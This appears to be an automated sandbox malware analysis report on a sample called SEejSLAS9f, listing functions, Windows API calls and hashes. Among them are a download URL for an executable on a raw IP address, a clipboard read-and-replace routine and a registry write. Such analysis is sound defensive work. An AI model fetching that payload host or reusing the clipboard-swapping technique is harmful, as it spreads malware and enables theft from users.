__dosmaperr.LIBCMT ref: 0043479F

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: ErrorFileLastPointer__dosmaperr
String ID:
API String ID: 2336955059-0
Opcode ID: 0f8939188b6fdc8a7da50d1b405e1129083f9e2b96a50d0a3cd5949e7845d65d
Instruction ID: bcc915797d3e420762720933ca2114d92cc1cd6946a03aaf12616f5971efc3d8
Opcode Fuzzy Hash: 0f8939188b6fdc8a7da50d1b405e1129083f9e2b96a50d0a3cd5949e7845d65d
Instruction Fuzzy Hash: 01016836710114ABCB148FAADC059EE7B29EFCA730F24020AF81487290EB35ED118B98

Function 00402BAD Relevance: 4.5, APIs: 3, Instructions: 41
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BCF
RegSetValueExW.KERNEL32(?,?,00000000,00000001,?,00000004,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BE7
RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BF7

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: CloseCreateValue
String ID:
API String ID: 1818849710-0
Opcode ID: 17a0f39c5dea863e0681c067e94205fb1cf9212befe975e377a74504568b03c9
Instruction ID: 415a99b38b1cf926e07f2752f011508d1a06d6109c2dcef31e57e84081a4d25d
Opcode Fuzzy Hash: 17a0f39c5dea863e0681c067e94205fb1cf9212befe975e377a74504568b03c9
Instruction Fuzzy Hash: ABF0B4B650011CFFEB214F94DD89DBBBA7CEB007E9F100175FA01B2150D6B19E009664

Function 0042E074 Relevance: 4.5, APIs: 3, Instructions: 31
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00431F5E: GetLastError.KERNEL32(?,?,?,0042EACE,00434D7C,?,00431F08,00000001,00000364,?,0042DFE5,00457910,00000010), ref: 00431F63
Part of subcall function 00431F5E: _free.LIBCMT ref: 00431F98
Part of subcall function 00431F5E: SetLastError.KERNEL32(00000000), ref: 00431FCC

ExitThread.KERNEL32 ref: 0042E086
CloseHandle.KERNEL32(?,?,?,0042E1A6,?,?,0042E01D,00000000), ref: 0042E0AE
FreeLibraryAndExitThread.KERNEL32(?,?,?,?,0042E1A6,?,?,0042E01D,00000000), ref: 0042E0C4

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: ErrorExitLastThread$CloseFreeHandleLibrary_free
String ID:
API String ID: 1198197534-0
Opcode ID: 358fd455719f577d8bc93a3d3127ed53d65e98e9d00355e3dd6338ab7ece4e02
Instruction ID: 941e5d7bb2069d1fb9760ffb86e13a1db41397deee20687f00b4917166382ed0
Opcode Fuzzy Hash: 358fd455719f577d8bc93a3d3127ed53d65e98e9d00355e3dd6338ab7ece4e02
Instruction Fuzzy Hash: 1BF054302006347BD735AF27E808A5B7A986F41775F584715FC25C22A1D768DD838659

Function 0040239E Relevance: 3.1, APIs: 2, Instructions: 125
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 004023C5
PostQuitMessage.USER32(00000000), ref: 00402563

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: MessagePostProcQuitWindow
String ID:
API String ID: 3873111417-0
Opcode ID: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
Instruction ID: 43c76da2243f772c6aced19a3fe0e8e69066b3bbdff08d4cabba9d560eb75400
Opcode Fuzzy Hash: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
Instruction Fuzzy Hash: 02412E25A64340A5E730EFA5BD55B2633B0FF64722F10252BE528DB2B2E3B28540C35E

Function 0040155A Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00001D1B), ref: 00401562

Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD

Strings

http://176.113.115.19/ScreenUpdateSync.exe, xrefs: 0040156D, 004016A6

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: _wcslen$Sleep
String ID: http://176.113.115.19/ScreenUpdateSync.exe
API String ID: 3358372957-3120454669
Opcode ID: ec5b8e6b587f5ffe173a4fe2956bfbb53381ca1a870b5d286590f738381d6d8e
Instruction ID: 033e26d6726dec48d9da5d172e0a3ce7e355aee553d479aaec466036f4edd3d7
Opcode Fuzzy Hash: ec5b8e6b587f5ffe173a4fe2956bfbb53381ca1a870b5d286590f738381d6d8e
Instruction Fuzzy Hash: 83319A15A6538094E330CFA0BC95A662330FF64B52F50653BD60CCB2B2E7A18587C35E

Function 00402960 Relevance: 3.0, APIs: 2, Instructions: 49COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0040298F
__fassign.LIBCMT ref: 0040299F

Part of subcall function 00402823: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00402906

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: Ios_base_dtor__fassign_wcslenstd::ios_base::_
String ID:
API String ID: 2843524283-0
Opcode ID: 99f78a7314c7ad5a03a0c5f770c80a671dc835224e362237c5e255d3e1775ea8
Instruction ID: f5c656a3c742482aaca5e7be5327d781ae1f97b048d34cfcbeac2439ecd5e81b
Opcode Fuzzy Hash: 99f78a7314c7ad5a03a0c5f770c80a671dc835224e362237c5e255d3e1775ea8
Instruction Fuzzy Hash: C901D6B1E0021C5ADB25FA25EC46BEE77689B41304F0041BFA605E31C1E9B85E85CAD8

Function 0040C0B4 Relevance: 3.0, APIs: 2, Instructions: 30COMMON

Download Yara Rule

APIs

std::_Locinfo::_Locinfo.LIBCPMT ref: 0040C0E9

Part of subcall function 0040BF5D: std::_Lockit::_Lockit.LIBCPMT ref: 0040BF71
Part of subcall function 0040BF5D: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040BFAE

Part of subcall function 0040BF2A: __Getctype.LIBCPMT ref: 0040BF45

std::_Locinfo::~_Locinfo.LIBCPMT ref: 0040C0FD

Part of subcall function 0040C008: std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0040C02F
Part of subcall function 0040C008: std::_Lockit::~_Lockit.LIBCPMT ref: 0040C0A0

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: std::_$Locinfo::_$LocinfoLockit$GetctypeLocinfo::~_Locinfo_ctorLocinfo_dtorLockit::_Lockit::~_
String ID:
API String ID: 3634385808-0
Opcode ID: ae6b82ab4aa1cb2813410f5dbc9e26b8ea2e08ff5e6c6b46999cb03fa267a897
Instruction ID: 5b43c555da5e36d5f90762d8cf6af0aa3317985bb24b5d7811fbdb20f9a73e34
Opcode Fuzzy Hash: ae6b82ab4aa1cb2813410f5dbc9e26b8ea2e08ff5e6c6b46999cb03fa267a897
Instruction Fuzzy Hash: 54F05832500215DADB21EBA5C852B9C7371AF40714F60813BF505BB2C2DBB85A488A8C

Function 02470E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000400,?,?,02470223,?,?), ref: 02470E19
SetErrorMode.KERNEL32(00000000,?,?,02470223,?,?), ref: 02470E1E

Memory Dump Source

Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: df7174f9f57e46548dd531f3c2dfcdef14bbfe03a49bac81fa522fe882d0dbf2
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 22D0123114512877D7002A94DC09BCE7B1CDF09B66F008011FB0DD9180C770954046E5

Function 00434186 Relevance: 1.7, APIs: 1, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77dff8414438c132d9b1b222249ac9577754d763359ce41167806e2a442978e4
Instruction ID: 5858c2b1917228bc3ee007884971bc5cb621fb913b3acd2bc442863518e7715d
Opcode Fuzzy Hash: 77dff8414438c132d9b1b222249ac9577754d763359ce41167806e2a442978e4
Instruction Fuzzy Hash: 4051D531A00218AFDB10DF59C840BEA7BA1EFC9364F19919AF818AB391C779FD42C754

Function 0040369F Relevance: 1.6, APIs: 1, Instructions: 95COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 0040377C

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 330fcc4d7d5ac5b0b2ca1a235d838fa7146c9714e98705db01c69e2caad3ca42
Instruction ID: e1021867f2ec77c7d2f8cf192b2e918c2079a777806a714b314ab491ad94b1c1
Opcode Fuzzy Hash: 330fcc4d7d5ac5b0b2ca1a235d838fa7146c9714e98705db01c69e2caad3ca42
Instruction Fuzzy Hash: 5831ADB1604312AFC710DF2AC88092ABFA9BF84351F04893EFD4497390D739DA548B8A

Function 00402823 Relevance: 1.6, APIs: 1, Instructions: 69COMMON

Download Yara Rule

APIs

std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00402906

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: Ios_base_dtorstd::ios_base::_
String ID:
API String ID: 323602529-0
Opcode ID: 9e105bc645d13b5be37bf51f85b07603bbf9c4582c9b25cdf04d4c3893a06c3e
Instruction ID: a0c314b69e82cee7068a10c27dc1ba61f54dd3d6c342bb4161a68c9c894be626
Opcode Fuzzy Hash: 9e105bc645d13b5be37bf51f85b07603bbf9c4582c9b25cdf04d4c3893a06c3e
Instruction Fuzzy Hash: B03118B4D002199BDB14EFA5D881AEDBBB4BF08304F5085AEE415B3281DB786A49CF54

Function 004048C5 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

Part of subcall function 0040C618: __CxxThrowException@8.LIBVCRUNTIME ref: 0040C677

std::locale::_Init.LIBCPMT ref: 00404911

Part of subcall function 0040DB27: std::_Lockit::_Lockit.LIBCPMT ref: 0040DB39
Part of subcall function 0040DB27: std::locale::_Setgloballocale.LIBCPMT ref: 0040DB54
Part of subcall function 0040DB27: _Yarn.LIBCPMT ref: 0040DB6A
Part of subcall function 0040DB27: std::_Lockit::~_Lockit.LIBCPMT ref: 0040DBAA

Part of subcall function 0040C189: std::_Lockit::_Lockit.LIBCPMT ref: 0040C19A
Part of subcall function 0040C189: int.LIBCPMT ref: 0040C1B1
Part of subcall function 0040C189: std::locale::_Getfacet.LIBCPMT ref: 0040C1BA
Part of subcall function 0040C189: std::_Lockit::~_Lockit.LIBCPMT ref: 0040C201

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: Lockitstd::_$std::locale::_$Lockit::_Lockit::~_$Exception@8GetfacetInitSetgloballocaleThrowYarn
String ID:
API String ID: 254928049-0
Opcode ID: 3c060e6656c3a05c784b0ffece6a0fdcb2b1fe0aa515981086c4a2bd745adef2
Instruction ID: 05a577be79a6d9972e4bbd44f5ae502994491d5de74025c362d1bb0bcb2044eb
Opcode Fuzzy Hash: 3c060e6656c3a05c784b0ffece6a0fdcb2b1fe0aa515981086c4a2bd745adef2
Instruction Fuzzy Hash: 772129B0A00706EFD714DF6AC185A59FBF4BF48314F50823EE449A7A81C774A964CB98

Function 00403CC2 Relevance: 1.6, APIs: 1, Instructions: 59COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00403CC9

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: H_prolog3_catch
String ID:
API String ID: 3886170330-0
Opcode ID: 28d5133743d5d263c03eb5789c04d0db7473107e9a476edf8ad5427a5007d233
Instruction ID: b71381d5bc9e259bdf0532d7d2dd1dfab3929909e68e206b89482bd8707b5f49
Opcode Fuzzy Hash: 28d5133743d5d263c03eb5789c04d0db7473107e9a476edf8ad5427a5007d233
Instruction Fuzzy Hash: 9F215E70600205DFCB11DF55C580EADBBB5BF48704F14C06EE815AB3A2C778AE50CB94

Function 00432785 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 004327C3

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: ebde34e331f36d73ae22f6b7be2bf13c9f524ff7c3251c4fe3554b52cc0156cf
Instruction ID: ced19a79aea4b3e33dd998471e9e3f3b23a78e9704dbb7c6d54aa915c2495f90
Opcode Fuzzy Hash: ebde34e331f36d73ae22f6b7be2bf13c9f524ff7c3251c4fe3554b52cc0156cf
Instruction Fuzzy Hash: 3911187590420AAFCF05DF58E94199B7BF4FF4C314F10406AF819AB311D671EA25CBA9

Function 00434D2A Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00431F08,00000001,00000364,?,0042DFE5,00457910,00000010), ref: 00434D6B

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 480f1ce45d14040ee3ea33e8ab56172a2f2fc49c365442aad9b5ef05e54ba84d
Instruction ID: f345a31986333b625da5146037888f7e6802a523d24ce61ba0d80c33f3994584
Opcode Fuzzy Hash: 480f1ce45d14040ee3ea33e8ab56172a2f2fc49c365442aad9b5ef05e54ba84d
Instruction Fuzzy Hash: 99F0BB31600520669B212F679C01BA73B48AFC9760F546527A804AB254DB2CF900459D

Function 0043CFCB Relevance: 1.5, APIs: 1, Instructions: 36COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0043D00C

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: dcff01ba0718bc25fbadba801be0e76f759b5211c2d86b2f90a3e61a906836b7
Instruction ID: e101c5f3f91c4e465480e224300ffd561ec2350ede5005b950df212ed8b6fbff
Opcode Fuzzy Hash: dcff01ba0718bc25fbadba801be0e76f759b5211c2d86b2f90a3e61a906836b7
Instruction Fuzzy Hash: B6F0BE33910008FBCF159E96DC01DDF3B6EEF8D338F100116F91492150DA3ACA21ABA4

Function 004336A7 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 94f750592cee1f743f5fc95d96a6c8fbd485f7a37a0c4c452716bcfbad1791b8
Instruction ID: 0777d31d9fa185a8b849a759fdbdb2b75b345829f9b614c7a8fa7ff1ccc7c9d0
Opcode Fuzzy Hash: 94f750592cee1f743f5fc95d96a6c8fbd485f7a37a0c4c452716bcfbad1791b8
Instruction Fuzzy Hash: AAE0E5313002207FD6303E675D07B5B36489F497A6F042127EC05A23D0DA6DEE0085AD

Function 0040FB0C Relevance: 1.5, APIs: 1, Instructions: 28COMMONLIBRARYCODE

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 004103C7

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: Exception@8Throw
String ID:
API String ID: 2005118841-0
Opcode ID: 0f8767ceb07e994d1f5b8eaac8dd392143d78e3b1b871650e8a1b44da905b8b1
Instruction ID: a93cbdcc7b8cec239d3e65b0583cf012edeaa99edf8fc6fd77b2b60b17382ec4
Opcode Fuzzy Hash: 0f8767ceb07e994d1f5b8eaac8dd392143d78e3b1b871650e8a1b44da905b8b1
Instruction Fuzzy Hash: 58E09B3450430E76CB1476A5FC1595D376C6A00354B904237BC28654D1DF78F59D858D

Function 0040BF2A Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

__Getctype.LIBCPMT ref: 0040BF45

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: Getctype
String ID:
API String ID: 2085600672-0
Opcode ID: 7bcbef9a924f57a23f140ac2bfa8bc84d39cfe862c52aa817c005c5a995eb04b
Instruction ID: 9e35d067b5090186e2253e8cafc45fe8648da69d29aab184c5b356960a576dda
Opcode Fuzzy Hash: 7bcbef9a924f57a23f140ac2bfa8bc84d39cfe862c52aa817c005c5a995eb04b
Instruction Fuzzy Hash: 29E086736005145B8701EE9D98819CBF7ECFE4A320300807BF909DF202D6B1A90886F4

Function 00404333 Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

_Deallocate.LIBCONCRT ref: 00404343

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: Deallocate
String ID:
API String ID: 1075933841-0
Opcode ID: d86d5cecc1e96241595adfcfb1704e736ddb91d28ce44d5c5f584f8131ffb7cb
Instruction ID: fec367d8aa59221bd54f7e77a34cd6e8baa5892bd02020f9b8e7ed08d49e55ed
Opcode Fuzzy Hash: d86d5cecc1e96241595adfcfb1704e736ddb91d28ce44d5c5f584f8131ffb7cb
Instruction Fuzzy Hash: 71D067B1518611CEE764DF69E444656B7E4EF04310B24492FE4D9D2694E6749880CB44

Function 0043CD0A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,00000000,?,0043D0E5,?,?,00000000,?,0043D0E5,00000000,0000000C), ref: 0043CD27

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: c1825962b9e2d68b99604ae1ec91ea351fd51148a2f332f138c69e8dc7c90181
Instruction ID: f5cec35e3468c2ebfedbe18043dc9de9c020ce50a8bef62643be49baa2ffa0a5
Opcode Fuzzy Hash: c1825962b9e2d68b99604ae1ec91ea351fd51148a2f332f138c69e8dc7c90181
Instruction Fuzzy Hash: DCD06C3200014DBBDF028F84DC06EDA3BAAFB48714F014150BA1856020C732E921AB95

Function 008DE285 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 008DE2D6

Memory Dump Source

Source File: 00000000.00000002.4093473645.00000000008DD000.00000040.00000020.00020000.00000000.sdmp, Offset: 008DD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8dd000_SEejSLAS9f.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 349dbba469a38cd92f2a36e0c5618d7315464f9eb16f7f6f9dfe16612e683eb5
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: DF112B79A00208EFDB01DF98C985E98BBF5EF08350F058095F9489B362D371EA50EB80

Non-executed Functions

Function 02471942 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 151clipboardsleepmemoryCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0247194D
Sleep.KERNEL32(00001541), ref: 02471957

Part of subcall function 0247CE77: _strlen.LIBCMT ref: 0247CE8E

OpenClipboard.USER32(00000000), ref: 02471984
GetClipboardData.USER32(00000001), ref: 02471994
_strlen.LIBCMT ref: 024719B0
_strlen.LIBCMT ref: 024719DF
_strlen.LIBCMT ref: 02471B23
EmptyClipboard.USER32 ref: 02471B39
GlobalAlloc.KERNEL32(00000002,00000001), ref: 02471B46
GlobalUnlock.KERNEL32(00000000), ref: 02471B70
SetClipboardData.USER32(00000001,00000000), ref: 02471B79
GlobalFree.KERNEL32(00000000), ref: 02471B80
CloseClipboard.USER32 ref: 02471BA4
Sleep.KERNEL32(000002D2), ref: 02471BAF

Strings

4#E, xrefs: 0247195D
i, xrefs: 024719C0

Memory Dump Source

Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd

Yara matches

Similarity

API ID: Clipboard$_strlen$Global$DataSleep$AllocCloseEmptyFreeH_prolog3_OpenUnlock
String ID: 4#E$i
API String ID: 4246938166-2480119546
Opcode ID: 45a8dad81ff59b0f4b4464c7594e59c36273e081b3ff668940b9dbd8c87fe3c1
Instruction ID: 298b8b0c4fbb2f95e2a549cbd02ea28dd9dae5447529ee76f9fe55d805f2df1f
Opcode Fuzzy Hash: 45a8dad81ff59b0f4b4464c7594e59c36273e081b3ff668940b9dbd8c87fe3c1
Instruction Fuzzy Hash: 50512430C00794DAE7119FA4ED45BED7B74FF2A306F04522AD809A2172EB709685CB69

Function 02472361 Relevance: 22.7, APIs: 15, Instructions: 205nativeCOMMON

Download Yara Rule

APIs

NtdllDefWindowProc_W.NTDLL(?,00000014,?,?), ref: 0247239C
GetClientRect.USER32(?,?), ref: 024723B1
GetDC.USER32(?), ref: 024723B8
CreateSolidBrush.GDI32(00646464), ref: 024723CB
CreatePen.GDI32(00000001,00000001,00FFFFFF), ref: 024723EA
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 0247240B
GetDeviceCaps.GDI32(00000000,0000005A), ref: 02472416
MulDiv.KERNEL32(00000008,00000000), ref: 0247241F
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000031,00451F10), ref: 02472443
SetBkMode.GDI32(?,00000001), ref: 024724CE
_wcslen.LIBCMT ref: 024724E6

Memory Dump Source

Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd

Yara matches

Similarity

API ID: Create$BrushCapsClientDeviceFontModeNtdllProc_RectRectangleSolidWindow_wcslen
String ID:
API String ID: 1529870607-0
Opcode ID: b907d1a1b1e1ec1e10588b01c324950f76be5009d0317e1f7e1d34b68f08428a
Instruction ID: 472f69582a65b026421a699589cae298f55ecf5e302f3a7551bcf3816fd69b57
Opcode Fuzzy Hash: b907d1a1b1e1ec1e10588b01c324950f76be5009d0317e1f7e1d34b68f08428a
Instruction Fuzzy Hash: 7571ED72900228AFDB62DF64DD85FAEBBBCEB09751F0041A5F509E6155DA70AF84CF20

Function 0043B76E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0043BA8D,?,00000000), ref: 0043B807
GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0043BA8D,?,00000000), ref: 0043B830
GetACP.KERNEL32(?,?,0043BA8D,?,00000000), ref: 0043B845

Strings

OCP, xrefs: 0043B7C2
ACP, xrefs: 0043B78C

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
Instruction ID: fa2a6f3f06b8257a5ac591d998b536fc1da73be0d13f1331aa64b533421ee897
Opcode Fuzzy Hash: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
Instruction Fuzzy Hash: 4B21A136A00104AAD738DF14C801B9777AAEF98F50F669466EB0AD7311E736DE41C7D8

Function 024AB9D5 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,024ABCF4,?,00000000), ref: 024ABA6E
GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,024ABCF4,?,00000000), ref: 024ABA97
GetACP.KERNEL32(?,?,024ABCF4,?,00000000), ref: 024ABAAC

Strings

ACP, xrefs: 024AB9F3
OCP, xrefs: 024ABA29

Memory Dump Source

Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
Instruction ID: ed2214ac0c159f1f5d33b7d022289b03c00b33e6c91c490dd3f30d079a01211e
Opcode Fuzzy Hash: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
Instruction Fuzzy Hash: A6217132701105AAEB348F54D921BA777A6EB74E5CB56C166E90BDB310F732DE81C390

Function 0043B942 Relevance: 7.7, APIs: 5, Instructions: 188COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
